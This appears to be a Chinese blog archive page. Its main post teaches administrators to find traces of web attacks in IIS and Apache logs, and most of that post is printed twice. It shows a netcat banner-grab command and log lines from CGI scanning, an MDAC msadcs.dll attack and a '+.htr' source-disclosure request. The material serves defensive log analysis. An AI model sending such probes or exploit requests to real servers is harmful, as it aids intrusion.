第五代隔離技術(shù)—安全通道隔離。此技術(shù)通過專用通信硬件和專有安全協(xié)議等安全機(jī)制,來實(shí)現(xiàn)內(nèi)外部網(wǎng)絡(luò)的隔離和數(shù)據(jù)交換,不僅解決了以前隔離技術(shù)存在的問題,并有效地把內(nèi)外部網(wǎng)絡(luò)隔離開來,而且高效地實(shí)現(xiàn)了內(nèi)外網(wǎng)數(shù)據(jù)的安全交換,透明支持多種網(wǎng)絡(luò)應(yīng)用,成為當(dāng)前隔離技術(shù)的發(fā)展方向。
隔離技術(shù)需具備的安全要點(diǎn)
要具有高度的自身安全性 隔離產(chǎn)品要保證自身具有高度的安全性,至少在理論和實(shí)踐上要比防火墻高一個(gè)安全級(jí)別。從技術(shù)實(shí)現(xiàn)上,除了和防火墻一樣對(duì)操作系統(tǒng)進(jìn)行加固優(yōu)化或采用安全操作系統(tǒng)外,關(guān)鍵在于要把外網(wǎng)接口和內(nèi)網(wǎng)接口從一套操作系統(tǒng)中分離出來。也就是說至少要由兩套主機(jī)系統(tǒng)組成,一套控制外網(wǎng)接口,另一套控制內(nèi)網(wǎng)接口,然后在兩套主機(jī)系統(tǒng)之間通過不可路由的協(xié)議進(jìn)行數(shù)據(jù)交換,如此,既便黑客攻破了外網(wǎng)系統(tǒng),仍然無法控制內(nèi)網(wǎng)系統(tǒng),就達(dá)到了更高的安全級(jí)別。
要確保網(wǎng)絡(luò)之間是隔離的 保證網(wǎng)間隔離的關(guān)鍵是網(wǎng)絡(luò)包不可路由到對(duì)方網(wǎng)絡(luò),無論中間采用了什么轉(zhuǎn)換方法,只要最終使得一方的網(wǎng)絡(luò)包能夠進(jìn)入到對(duì)方的網(wǎng)絡(luò)中,都無法稱之為隔離,即達(dá)不到隔離的效果。顯然,只是對(duì)網(wǎng)間的包進(jìn)行轉(zhuǎn)發(fā),并且允許建立端到端連接的防火墻,是沒有任何隔離效果的。此外,那些只是把網(wǎng)絡(luò)包轉(zhuǎn)換為文本,交換到對(duì)方網(wǎng)絡(luò)后,再把文本轉(zhuǎn)換為網(wǎng)絡(luò)包的產(chǎn)品也是沒有做到隔離的。
要保證網(wǎng)間交換的只是應(yīng)用數(shù)據(jù) 既然要達(dá)到網(wǎng)絡(luò)隔離,就必須做到徹底防范基于網(wǎng)絡(luò)協(xié)議的攻擊,即不能夠讓網(wǎng)絡(luò)層的攻擊包到達(dá)要保護(hù)的網(wǎng)絡(luò)中,所以就必須進(jìn)行協(xié)議分析,完成應(yīng)用層數(shù)據(jù)的提取,然后進(jìn)行數(shù)據(jù)交換,這樣就把諸如TearDrop、Land、Smurf和SYN Flood等網(wǎng)絡(luò)攻擊包,徹底地阻擋在了可信網(wǎng)絡(luò)之外,從而明顯地增強(qiáng)了可信網(wǎng)絡(luò)的安全性。
要對(duì)網(wǎng)間的訪問進(jìn)行嚴(yán)格的控制和檢查 作為一套適用于高安全度網(wǎng)絡(luò)的安全設(shè)備,要確保每次數(shù)據(jù)交換都是可信的和可控制的,嚴(yán)格防止非法通道的出現(xiàn),以確保信息數(shù)據(jù)的安全和訪問的可審計(jì)性。所以必須施加以一定的技術(shù),保證每一次數(shù)據(jù)交換過程都是可信的,并且內(nèi)容是可控制的,可采用基于會(huì)話的認(rèn)證技術(shù)和內(nèi)容分析與控制引擎等技術(shù)來實(shí)現(xiàn)。
要在堅(jiān)持隔離的前提下保證網(wǎng)絡(luò)暢通和應(yīng)用透明 隔離產(chǎn)品會(huì)部署在多種多樣的復(fù)雜網(wǎng)絡(luò)環(huán)境中,并且往往是數(shù)據(jù)交換的關(guān)鍵點(diǎn),因此,產(chǎn)品要具有很高的處理性能,不能夠成為網(wǎng)絡(luò)交換的瓶頸,要有很好的穩(wěn)定性;不能夠出現(xiàn)時(shí)斷時(shí)續(xù)的情況,要有很強(qiáng)的適應(yīng)性,能夠透明接入網(wǎng)絡(luò),并且透明支持多種應(yīng)用。
網(wǎng)絡(luò)隔離的關(guān)鍵點(diǎn)
網(wǎng)絡(luò)隔離的關(guān)鍵是在于系統(tǒng)對(duì)通信數(shù)據(jù)的控制,即通過不可路由的協(xié)議來完成網(wǎng)間的數(shù)據(jù)交換。由于通信硬件設(shè)備工作在網(wǎng)絡(luò)七層的最下層,并不能感知到交換數(shù)據(jù)的機(jī)密性、完整性、可用性、可控性、抗抵賴等安全要素,所以這要通過訪問控制、身份認(rèn)證、加密簽名等安全機(jī)制來實(shí)現(xiàn),而這些機(jī)制的實(shí)現(xiàn)都是通過軟件來實(shí)現(xiàn)的。
因此,隔離的關(guān)鍵點(diǎn)就成了要盡量提高網(wǎng)間數(shù)據(jù)交換的速度,并且對(duì)應(yīng)用能夠透明支持,以適應(yīng)復(fù)雜和高帶寬需求的網(wǎng)間數(shù)據(jù)交換。而由于設(shè)計(jì)原理問題使得第三代和第四代隔離產(chǎn)品在這方面很難突破,既便有所改進(jìn)也必須付出巨大的成本,和“適度安全”理念相悖。
隔離技術(shù)的未來發(fā)展方向
第五代隔離技術(shù)的出現(xiàn),是在對(duì)市場上網(wǎng)絡(luò)隔離產(chǎn)品和高安全度網(wǎng)需求的詳細(xì)分析情況下產(chǎn)生的,它不僅很好地解決了第三代和第四代很難解決的速度瓶頸問題,并且先進(jìn)的安全理念和設(shè)計(jì)思路,明顯地提升了產(chǎn)品的安全功能,是一種創(chuàng)新的隔離防護(hù)手段。
隔離原理 第五代隔離技術(shù)的實(shí)現(xiàn)原理是通過專用通信設(shè)備、專有安全協(xié)議和加密驗(yàn)證機(jī)制及應(yīng)用層數(shù)據(jù)提取和鑒別認(rèn)證技術(shù),進(jìn)行不同安全級(jí)別網(wǎng)絡(luò)之間的數(shù)據(jù)交換,徹底阻斷了網(wǎng)絡(luò)間的直接TCP/IP連接,同時(shí)對(duì)網(wǎng)間通信的雙方、內(nèi)容、過程施以嚴(yán)格的身份認(rèn)證、內(nèi)容過濾、安全審計(jì)等多種安全防護(hù)機(jī)制,從而保證了網(wǎng)間數(shù)據(jù)交換的安全、可控,杜絕了由于操作系統(tǒng)和網(wǎng)絡(luò)協(xié)議自身漏洞帶來的安全風(fēng)險(xiǎn)。
從服務(wù)器的記錄尋找黑客的蛛絲馬跡
[ 2007-03-25 03:58:49 | 作者: sun ]
當(dāng)服務(wù)器被攻擊時(shí),最容易被人忽略的地方,就是記錄文件,服務(wù)器的記錄文件了黑客活動(dòng)的蛛絲馬跡。在這里,我為大家介紹一下兩種常見的網(wǎng)頁服務(wù)器中最重要的記錄文件,分析服務(wù)器遭到攻擊后,黑客在記錄文件中留下什么記錄。
目前最常見的網(wǎng)頁服務(wù)器有兩種:Apache和微軟的Internet Information Server (簡稱IIS)。這兩種服務(wù)器都有一般版本和SSL認(rèn)證版本,方便黑客對(duì)加密和未加密的服務(wù)器進(jìn)行攻擊。
IIS的預(yù)設(shè)記錄文件地址在 c:winntsystem32logfilesw3svc1的目錄下,文件名是當(dāng)天的日期,如yymmdd.log。系統(tǒng)會(huì)每天產(chǎn)生新的記錄文件。預(yù)設(shè)的格式是W3C延伸記錄文件格式(W3C Extended Log File Format),很多相關(guān)軟件都可以解譯、分析這種格式的檔案。記錄文件在預(yù)設(shè)的狀況下會(huì)記錄時(shí)間、客戶端IP地址、method(GET、POST等)、URI stem(要求的資源)、和HTTP狀態(tài)(數(shù)字狀態(tài)代碼)。這些字段大部分都一看就懂,可是HTTP狀態(tài)就需要解讀了。一般而言,如果代碼是在200到299代表成功。常見的200狀態(tài)碼代表符合客戶端的要求。300到399代表必須由客戶端采取動(dòng)作才能滿足所提出的要求。400到499和500到599代表客戶端和服務(wù)器有問題。最常見的狀態(tài)代碼有兩個(gè),一個(gè)是404,代表客戶端要求的資源不在服務(wù)器上,403代表的是所要求的資源拒絕服務(wù)。Apache記錄文件的預(yù)設(shè)儲(chǔ)存位置在/usr/local/apache/logs。最有價(jià)值的記錄文件是access_log,不過 ssl_request_log和ssl_engine_log也能提供有用的資料。 access_log記錄文件有七個(gè)字段,包括客戶端IP地址、特殊人物識(shí)別符、用戶名稱、日期、Method Resource Protocol(GET、POST等;要求哪些資源;然后是協(xié)議的版本)、HTTP狀態(tài)、還有傳輸?shù)淖止?jié)。
我在這里所用的是與黑客用的相似的模擬攻擊網(wǎng)站方式和工具。(注意:在本文中所介紹的方法請(qǐng)大家不要試用,請(qǐng)大家自覺遵守網(wǎng)絡(luò)準(zhǔn)則!)
分析過程
網(wǎng)頁服務(wù)器版本是很重要的信息,黑客一般先向網(wǎng)頁服務(wù)器提出要求,讓服務(wù)器送回本身的版本信息。只要把「HEAD / HTTP/1.0」這個(gè)字符串用常見的netcat utility(相關(guān)資料網(wǎng)址:http://www.l0pht.com/~weld/netcat/)和OpenSSL binary(相關(guān)資料網(wǎng)址:http://www.openssl.org/)送到開放服務(wù)器的通訊端口就成了。注意看下面的示范:
C:>nc -n 10.0.2.55 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 08 Mar 2001 14:31:00 GMT
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGQQQQQPA=IHOJAGJDECOLLGIBNKMCEEED; path=/
Cache-control: private
這種形式的要求在IIS和Apache的記錄文件中會(huì)生成以下記錄:
IIS: 15:08:44 11.1.2.80 HEAD /Default.asp 200
Linux: 11.1.2.80 - - [08/Mar/2001:15:56:39 -0700] "HEAD / HTTP/1.0" 200 0
雖然這類要求合法,看似很平常,不過卻常常是網(wǎng)絡(luò)攻擊的前奏曲。access_log和IIS的記錄文件沒有表明這個(gè)要求是連到SSL服務(wù)器還是一般的網(wǎng)頁服務(wù)器,可是Apache的 ssl_request_log和ssl_engine_log(在/usr/local/apache/logs目錄下)這兩個(gè)記錄文件就會(huì)記錄是否有聯(lián)機(jī)到SSL服務(wù)器。請(qǐng)看以下的ssl_request_log記錄文件:
[07/Mar/2001:15:32:52 -0700] 11.1.1.50 SSLv3 EDH-RSA-DES-CBC3-SHA "HEAD / HTTP/1.0" 0
第三和第四個(gè)字段表示客戶端使用的是哪種加密方式。以下的ssl_request_log分別記錄從OpenSSL、 Internet Explorer和Netscape客戶端程序發(fā)出的要求。
[07/Mar/2001:15:48:26 -0700] 11.1.1.50 SSLv3 EDH-RSA-DES-CBC3-SHA "GET / HTTP/1.0" 2692
[07/Mar/2001:15:52:51 -0700] 10.0.2.55 TLSv1 RC4-MD5 "GET / HTTP/1.1" 2692
[07/Mar/2001:15:54:46 -0700] 11.1.1.50 SSLv3 EXP-RC4-MD5 "GET / HTTP/1.0" 2692
[07/Mar/2001:15:55:34 –0700] 11.1.2.80 SSLv3 RC4-MD5 “GET / HTTP/1.0” 2692
另外黑客通常會(huì)復(fù)制一個(gè)網(wǎng)站(也就是所謂的鏡射網(wǎng)站。),來取得發(fā)動(dòng)攻擊所需要的信息。網(wǎng)頁原始碼中的批注字段常有目錄、文件名甚至密碼的有用資料。復(fù)制網(wǎng)站常用的工具包括窗口系統(tǒng)的Teleport Pro(網(wǎng)址:http://www.tenmax.com/teleport/pro/home.htm)和Unix系統(tǒng)的wget(網(wǎng)址:http://www.gnu.org/manual/wget/)。在這里我為大家分析wget和TeleportPro這兩個(gè)軟件攻擊網(wǎng)頁服務(wù)器后記錄文件中的內(nèi)容。這兩個(gè)軟件能全面快速搜尋整個(gè)網(wǎng)站,對(duì)所有公開的網(wǎng)頁提出要求。只要檢查一下記錄文件就知道,要解譯鏡射這個(gè)動(dòng)作是很簡單的事。以下是IIS的記錄文件:
16:28:52 11.1.2.80 GET /Default.asp 200
16:28:52 11.1.2.80 GET /robots.txt 404
16:28:52 11.1.2.80 GET /header_protecting_your_privacy.gif 200
16:28:52 11.1.2.80 GET /header_fec_reqs.gif 200
16:28:55 11.1.2.80 GET /photo_contribs_sidebar.jpg 200
16:28:55 11.1.2.80 GET /g2klogo_white_bgd.gif 200
16:28:55 11.1.2.80 GET /header_contribute_on_line.gif 200
注:11.1.2.80這個(gè)主機(jī)是Unix系統(tǒng)的客戶端,是用wget軟件發(fā)出請(qǐng)求。
16:49:01 11.1.1.50 GET /Default.asp 200
16:49:01 11.1.1.50 GET /robots.txt 404
16:49:01 11.1.1.50 GET /header_contribute_on_line.gif 200
16:49:01 11.1.1.50 GET /g2klogo_white_bgd.gif 200
16:49:01 11.1.1.50 GET /photo_contribs_sidebar.jpg 200
16:49:01 11.1.1.50 GET /header_fec_reqs.gif 200
16:49:01 11.1.1.50 GET /header_protecting_your_privacy.gif 200
注:11.1.1.50系統(tǒng)是窗口環(huán)境的客戶端,用的是TeleportPro發(fā)出請(qǐng)求。
注意:以上兩個(gè)主機(jī)都要求robots.txt這個(gè)檔,其實(shí)這個(gè)檔案是網(wǎng)頁管理員的工具,作用是防止wget和TeleportPro這類自動(dòng)抓文件軟件對(duì)某些網(wǎng)頁從事抓取或搜尋的動(dòng)作。如果有人提出robots.txt檔的要求,常常代表是要鏡射整個(gè)網(wǎng)站。但,TeleportPro和wget這兩個(gè)軟件都可以把要求robots.txt這個(gè)文件的功能取消。另一個(gè)偵測鏡射動(dòng)作的方式,是看看有沒有同一個(gè)客戶端IP反復(fù)提出資源要求。
黑客還可以用網(wǎng)頁漏洞稽核軟件:Whisker(網(wǎng)址:http://www.wiretrip.net/),來偵查網(wǎng)頁服務(wù)器有沒有安全后門(主要是檢查有沒有cgi-bin程序,這種程序會(huì)讓系統(tǒng)產(chǎn)生安全漏洞)。以下是IIS和Apache網(wǎng)頁服務(wù)器在執(zhí)行Whisker后產(chǎn)生的部分記錄文件。
IIS:
13:17:56 11.1.1.50 GET /SiteServer/Publishing/viewcode.asp 404
13:17:56 11.1.1.50 GET /msadc/samples/adctest.asp 200
13:17:56 11.1.1.50 GET /advworks/equipment/catalog_type.asp 404
13:17:56 11.1.1.50 GET /iisadmpwd/aexp4b.htr 200
13:17:56 11.1.1.50 HEAD /scripts/samples/details.idc 200
13:17:56 11.1.1.50 GET /scripts/samples/details.idc 200
13:17:56 11.1.1.50 HEAD /scripts/samples/ctguestb.idc 200
13:17:56 11.1.1.50 GET /scripts/samples/ctguestb.idc 200
13:17:56 11.1.1.50 HEAD /scripts/tools/newdsn.exe 404
13:17:56 11.1.1.50 HEAD /msadc/msadcs.dll 200
13:17:56 11.1.1.50 GET /scripts/iisadmin/bdir.htr 200
13:17:56 11.1.1.50 HEAD /carbo.dll 404
13:17:56 11.1.1.50 HEAD /scripts/proxy/ 403
13:17:56 11.1.1.50 HEAD /scripts/proxy/w3proxy.dll 500
13:17:56 11.1.1.50 GET /scripts/proxy/w3proxy.dll 500
Apache:
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfcache.map HTTP/1.0" 404 266
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfide/Administrator/startstop.html HTTP/1.0" 404 289
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfappman/index.cfm HTTP/1.0" 404 273
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cgi-bin/ HTTP/1.0" 403 267
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "GET /cgi-bin/dbmlparser.exe HTTP/1.0" 404 277
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /_vti_inf.html HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /_vti_pvt/ HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/webdist.cgi HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/handler HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/wrap HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 0
大家要偵測這類攻擊的關(guān)鍵,就在于從單一IP地址發(fā)出大量的404 HTTP狀態(tài)代碼。只要注意到這類信息,就可以分析對(duì)方要求的資源;于是它們就會(huì)拼命要求提供 cgi-bin scripts(Apache 服務(wù)器的 cgi-bin 目錄;IIS服務(wù)器的 scripts目錄)。
小結(jié)
網(wǎng)頁如果被人探訪過,總會(huì)在記錄文件留下什么線索。如果網(wǎng)頁管理員警覺性夠高,應(yīng)該會(huì)把分析記錄文件作為追查線索,并且在檢查后發(fā)現(xiàn)網(wǎng)站真的有漏洞時(shí),就能預(yù)測會(huì)有黑客攻擊網(wǎng)站。
接下來我要向大家示范兩種常見的網(wǎng)頁服務(wù)器攻擊方式,分析服務(wù)器在受到攻擊后黑客在記錄文件中痕跡。
(1)MDAC攻擊
MDAC攻擊法可以讓網(wǎng)頁的客戶端在IIS網(wǎng)頁服務(wù)器上執(zhí)行命令。如果有人開始攻擊IIS服務(wù)器,記錄文件就會(huì)記下客戶端曾經(jīng)呼叫msadcs.dll文檔:
17:48:49 12.1.2.8 GET /msadc/msadcs.dll 200
17:48:51 12.1.2.8 POST /msadc/msadcs.dll 200
(2)利用原始碼漏洞
第二種攻擊方式也很普遍,就是會(huì)影響ASP和Java網(wǎng)頁的暴露原始碼漏洞。 最晚被發(fā)現(xiàn)的安全漏洞是 +.htr 臭蟲,這個(gè)bug會(huì)顯示ASP原始碼。 如果有人利用這個(gè)漏洞攻擊,就會(huì)在IIS的記錄文件里面留下這些線索:
17:50:13 11.1.2.80 GET /default.asp+.htr 200
網(wǎng)頁常會(huì)只讓有權(quán)限的使用者進(jìn)入。接下來我們要讓各位看 Apache的access_log記錄文件會(huì)在登錄失敗時(shí)留下什么線索:
12.1.2.8 - user [08/Mar/2001:18:58:29 -0700] "GET /private/ HTTP/1.0" 401 462
注:第三欄里面的使用者名稱是「user」。還有要注意HTTP的狀態(tài)代號(hào)是401,代表非法存取。
目前最常見的網(wǎng)頁服務(wù)器有兩種:Apache和微軟的Internet Information Server (簡稱IIS)。這兩種服務(wù)器都有一般版本和SSL認(rèn)證版本,方便黑客對(duì)加密和未加密的服務(wù)器進(jìn)行攻擊。
IIS的預(yù)設(shè)記錄文件地址在 c:winntsystem32logfilesw3svc1的目錄下,文件名是當(dāng)天的日期,如yymmdd.log。系統(tǒng)會(huì)每天產(chǎn)生新的記錄文件。預(yù)設(shè)的格式是W3C延伸記錄文件格式(W3C Extended Log File Format),很多相關(guān)軟件都可以解譯、分析這種格式的檔案。記錄文件在預(yù)設(shè)的狀況下會(huì)記錄時(shí)間、客戶端IP地址、method(GET、POST等)、URI stem(要求的資源)、和HTTP狀態(tài)(數(shù)字狀態(tài)代碼)。這些字段大部分都一看就懂,可是HTTP狀態(tài)就需要解讀了。一般而言,如果代碼是在200到299代表成功。常見的200狀態(tài)碼代表符合客戶端的要求。300到399代表必須由客戶端采取動(dòng)作才能滿足所提出的要求。400到499和500到599代表客戶端和服務(wù)器有問題。最常見的狀態(tài)代碼有兩個(gè),一個(gè)是404,代表客戶端要求的資源不在服務(wù)器上,403代表的是所要求的資源拒絕服務(wù)。Apache記錄文件的預(yù)設(shè)儲(chǔ)存位置在/usr/local/apache/logs。最有價(jià)值的記錄文件是access_log,不過 ssl_request_log和ssl_engine_log也能提供有用的資料。 access_log記錄文件有七個(gè)字段,包括客戶端IP地址、特殊人物識(shí)別符、用戶名稱、日期、Method Resource Protocol(GET、POST等;要求哪些資源;然后是協(xié)議的版本)、HTTP狀態(tài)、還有傳輸?shù)淖止?jié)。
我在這里所用的是與黑客用的相似的模擬攻擊網(wǎng)站方式和工具。(注意:在本文中所介紹的方法請(qǐng)大家不要試用,請(qǐng)大家自覺遵守網(wǎng)絡(luò)準(zhǔn)則!)
分析過程
網(wǎng)頁服務(wù)器版本是很重要的信息,黑客一般先向網(wǎng)頁服務(wù)器提出要求,讓服務(wù)器送回本身的版本信息。只要把「HEAD / HTTP/1.0」這個(gè)字符串用常見的netcat utility(相關(guān)資料網(wǎng)址:http://www.l0pht.com/~weld/netcat/)和OpenSSL binary(相關(guān)資料網(wǎng)址:http://www.openssl.org/)送到開放服務(wù)器的通訊端口就成了。注意看下面的示范:
C:>nc -n 10.0.2.55 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 08 Mar 2001 14:31:00 GMT
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGQQQQQPA=IHOJAGJDECOLLGIBNKMCEEED; path=/
Cache-control: private
這種形式的要求在IIS和Apache的記錄文件中會(huì)生成以下記錄:
IIS: 15:08:44 11.1.2.80 HEAD /Default.asp 200
Linux: 11.1.2.80 - - [08/Mar/2001:15:56:39 -0700] "HEAD / HTTP/1.0" 200 0
雖然這類要求合法,看似很平常,不過卻常常是網(wǎng)絡(luò)攻擊的前奏曲。access_log和IIS的記錄文件沒有表明這個(gè)要求是連到SSL服務(wù)器還是一般的網(wǎng)頁服務(wù)器,可是Apache的 ssl_request_log和ssl_engine_log(在/usr/local/apache/logs目錄下)這兩個(gè)記錄文件就會(huì)記錄是否有聯(lián)機(jī)到SSL服務(wù)器。請(qǐng)看以下的ssl_request_log記錄文件:
[07/Mar/2001:15:32:52 -0700] 11.1.1.50 SSLv3 EDH-RSA-DES-CBC3-SHA "HEAD / HTTP/1.0" 0
第三和第四個(gè)字段表示客戶端使用的是哪種加密方式。以下的ssl_request_log分別記錄從OpenSSL、 Internet Explorer和Netscape客戶端程序發(fā)出的要求。
[07/Mar/2001:15:48:26 -0700] 11.1.1.50 SSLv3 EDH-RSA-DES-CBC3-SHA "GET / HTTP/1.0" 2692
[07/Mar/2001:15:52:51 -0700] 10.0.2.55 TLSv1 RC4-MD5 "GET / HTTP/1.1" 2692
[07/Mar/2001:15:54:46 -0700] 11.1.1.50 SSLv3 EXP-RC4-MD5 "GET / HTTP/1.0" 2692
[07/Mar/2001:15:55:34 –0700] 11.1.2.80 SSLv3 RC4-MD5 “GET / HTTP/1.0” 2692
另外黑客通常會(huì)復(fù)制一個(gè)網(wǎng)站(也就是所謂的鏡射網(wǎng)站。),來取得發(fā)動(dòng)攻擊所需要的信息。網(wǎng)頁原始碼中的批注字段常有目錄、文件名甚至密碼的有用資料。復(fù)制網(wǎng)站常用的工具包括窗口系統(tǒng)的Teleport Pro(網(wǎng)址:http://www.tenmax.com/teleport/pro/home.htm)和Unix系統(tǒng)的wget(網(wǎng)址:http://www.gnu.org/manual/wget/)。在這里我為大家分析wget和TeleportPro這兩個(gè)軟件攻擊網(wǎng)頁服務(wù)器后記錄文件中的內(nèi)容。這兩個(gè)軟件能全面快速搜尋整個(gè)網(wǎng)站,對(duì)所有公開的網(wǎng)頁提出要求。只要檢查一下記錄文件就知道,要解譯鏡射這個(gè)動(dòng)作是很簡單的事。以下是IIS的記錄文件:
16:28:52 11.1.2.80 GET /Default.asp 200
16:28:52 11.1.2.80 GET /robots.txt 404
16:28:52 11.1.2.80 GET /header_protecting_your_privacy.gif 200
16:28:52 11.1.2.80 GET /header_fec_reqs.gif 200
16:28:55 11.1.2.80 GET /photo_contribs_sidebar.jpg 200
16:28:55 11.1.2.80 GET /g2klogo_white_bgd.gif 200
16:28:55 11.1.2.80 GET /header_contribute_on_line.gif 200
注:11.1.2.80這個(gè)主機(jī)是Unix系統(tǒng)的客戶端,是用wget軟件發(fā)出請(qǐng)求。
16:49:01 11.1.1.50 GET /Default.asp 200
16:49:01 11.1.1.50 GET /robots.txt 404
16:49:01 11.1.1.50 GET /header_contribute_on_line.gif 200
16:49:01 11.1.1.50 GET /g2klogo_white_bgd.gif 200
16:49:01 11.1.1.50 GET /photo_contribs_sidebar.jpg 200
16:49:01 11.1.1.50 GET /header_fec_reqs.gif 200
16:49:01 11.1.1.50 GET /header_protecting_your_privacy.gif 200
注:11.1.1.50系統(tǒng)是窗口環(huán)境的客戶端,用的是TeleportPro發(fā)出請(qǐng)求。
注意:以上兩個(gè)主機(jī)都要求robots.txt這個(gè)檔,其實(shí)這個(gè)檔案是網(wǎng)頁管理員的工具,作用是防止wget和TeleportPro這類自動(dòng)抓文件軟件對(duì)某些網(wǎng)頁從事抓取或搜尋的動(dòng)作。如果有人提出robots.txt檔的要求,常常代表是要鏡射整個(gè)網(wǎng)站。但,TeleportPro和wget這兩個(gè)軟件都可以把要求robots.txt這個(gè)文件的功能取消。另一個(gè)偵測鏡射動(dòng)作的方式,是看看有沒有同一個(gè)客戶端IP反復(fù)提出資源要求。
黑客還可以用網(wǎng)頁漏洞稽核軟件:Whisker(網(wǎng)址:http://www.wiretrip.net/),來偵查網(wǎng)頁服務(wù)器有沒有安全后門(主要是檢查有沒有cgi-bin程序,這種程序會(huì)讓系統(tǒng)產(chǎn)生安全漏洞)。以下是IIS和Apache網(wǎng)頁服務(wù)器在執(zhí)行Whisker后產(chǎn)生的部分記錄文件。
IIS:
13:17:56 11.1.1.50 GET /SiteServer/Publishing/viewcode.asp 404
13:17:56 11.1.1.50 GET /msadc/samples/adctest.asp 200
13:17:56 11.1.1.50 GET /advworks/equipment/catalog_type.asp 404
13:17:56 11.1.1.50 GET /iisadmpwd/aexp4b.htr 200
13:17:56 11.1.1.50 HEAD /scripts/samples/details.idc 200
13:17:56 11.1.1.50 GET /scripts/samples/details.idc 200
13:17:56 11.1.1.50 HEAD /scripts/samples/ctguestb.idc 200
13:17:56 11.1.1.50 GET /scripts/samples/ctguestb.idc 200
13:17:56 11.1.1.50 HEAD /scripts/tools/newdsn.exe 404
13:17:56 11.1.1.50 HEAD /msadc/msadcs.dll 200
13:17:56 11.1.1.50 GET /scripts/iisadmin/bdir.htr 200
13:17:56 11.1.1.50 HEAD /carbo.dll 404
13:17:56 11.1.1.50 HEAD /scripts/proxy/ 403
13:17:56 11.1.1.50 HEAD /scripts/proxy/w3proxy.dll 500
13:17:56 11.1.1.50 GET /scripts/proxy/w3proxy.dll 500
Apache:
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfcache.map HTTP/1.0" 404 266
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfide/Administrator/startstop.html HTTP/1.0" 404 289
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfappman/index.cfm HTTP/1.0" 404 273
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cgi-bin/ HTTP/1.0" 403 267
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "GET /cgi-bin/dbmlparser.exe HTTP/1.0" 404 277
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /_vti_inf.html HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /_vti_pvt/ HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/webdist.cgi HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/handler HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/wrap HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 0
大家要偵測這類攻擊的關(guān)鍵,就在于從單一IP地址發(fā)出大量的404 HTTP狀態(tài)代碼。只要注意到這類信息,就可以分析對(duì)方要求的資源;于是它們就會(huì)拼命要求提供 cgi-bin scripts(Apache 服務(wù)器的 cgi-bin 目錄;IIS服務(wù)器的 scripts目錄)。
小結(jié)
網(wǎng)頁如果被人探訪過,總會(huì)在記錄文件留下什么線索。如果網(wǎng)頁管理員警覺性夠高,應(yīng)該會(huì)把分析記錄文件作為追查線索,并且在檢查后發(fā)現(xiàn)網(wǎng)站真的有漏洞時(shí),就能預(yù)測會(huì)有黑客攻擊網(wǎng)站。
接下來我要向大家示范兩種常見的網(wǎng)頁服務(wù)器攻擊方式,分析服務(wù)器在受到攻擊后黑客在記錄文件中痕跡。
(1)MDAC攻擊
MDAC攻擊法可以讓網(wǎng)頁的客戶端在IIS網(wǎng)頁服務(wù)器上執(zhí)行命令。如果有人開始攻擊IIS服務(wù)器,記錄文件就會(huì)記下客戶端曾經(jīng)呼叫msadcs.dll文檔:
17:48:49 12.1.2.8 GET /msadc/msadcs.dll 200
17:48:51 12.1.2.8 POST /msadc/msadcs.dll 200
(2)利用原始碼漏洞
第二種攻擊方式也很普遍,就是會(huì)影響ASP和Java網(wǎng)頁的暴露原始碼漏洞。 最晚被發(fā)現(xiàn)的安全漏洞是 +.htr 臭蟲,這個(gè)bug會(huì)顯示ASP原始碼。 如果有人利用這個(gè)漏洞攻擊,就會(huì)在IIS的記錄文件里面留下這些線索:
17:50:13 11.1.2.80 GET /default.asp+.htr 200
網(wǎng)頁常會(huì)只讓有權(quán)限的使用者進(jìn)入。接下來我們要讓各位看 Apache的access_log記錄文件會(huì)在登錄失敗時(shí)留下什么線索:
12.1.2.8 - user [08/Mar/2001:18:58:29 -0700] "GET /private/ HTTP/1.0" 401 462
注:第三欄里面的使用者名稱是「user」。還有要注意HTTP的狀態(tài)代號(hào)是401,代表非法存取。
阻止攻擊者對(duì)Windows注冊(cè)表的遠(yuǎn)程訪問
[ 2007-03-25 03:58:37 | 作者: sun ]
按照本文中所提及的方式保護(hù)Windows注冊(cè)表,能夠防止攻擊者遠(yuǎn)程攻擊它。
問題
